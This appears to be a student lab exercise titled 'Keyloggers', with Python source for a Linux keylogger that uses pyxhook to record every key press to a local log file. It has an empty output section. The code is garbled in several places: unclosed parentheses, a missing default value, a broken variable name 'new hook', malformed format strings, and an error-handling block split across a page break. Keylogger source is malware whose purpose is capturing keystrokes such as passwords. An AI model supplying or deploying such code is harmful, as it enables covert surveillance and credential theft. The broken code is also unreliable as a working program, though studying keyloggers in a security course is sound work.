Reg no: 210701067 Name: Hari Amerthesh N

Exp 4: Keyloggers

Code:

```
# Python code for keylogger
# to be used in linux
import os
import pyxhook
# This tells the keylogger where the log file will go.
# You can set the file path as an environment variable ('pylogger file'),
# or use the default ~/Desktop/file.log
log_file = os.environ.get(
  'pylogger_file',
  os.path.expanduser('~/Desktop/file.log')
# Allow setting the cancel key from environment args, Default: `
cancel_key = ord(
  os.environ.get(
     'pylogger_cancel',
  [0]
)
# Allow clearing the log file on start, if pylogger clean is defined.
if os.environ.get('pylogger_clean', None) is not None:
  try:
     os.remove(log_file)
  except EnvironmentError:
    # File does not exist, or no permissions.
     pass
#creating key pressing event and saving it into log file
def OnKeyPress(event):
  with open(log_file, 'a') as f:
     f.write('{ }\n'.format(event.Key))
# create a hook manager object
new_hook = pyxhook.HookManager()
new_hook.KeyDown = OnKeyPress
# set the hook
new_hook.HookKeyboard()
try:
  new hook.start()
                         # start the hook
except KeyboardInterrupt:
  # User cancelled from command line.
  pass
except Exception as ex:
  # Write exceptions to the log file, for analysis later.
  msg = 'Error while catching events:\n { }'.format(ex)
```

Reg no: 210701067 Name: Hari Amerthesh N

```
pyxhook.print_err(msg)
with open(log_file, 'a') as f:
  f.write('\n{}'.format(msg))
```

Output:

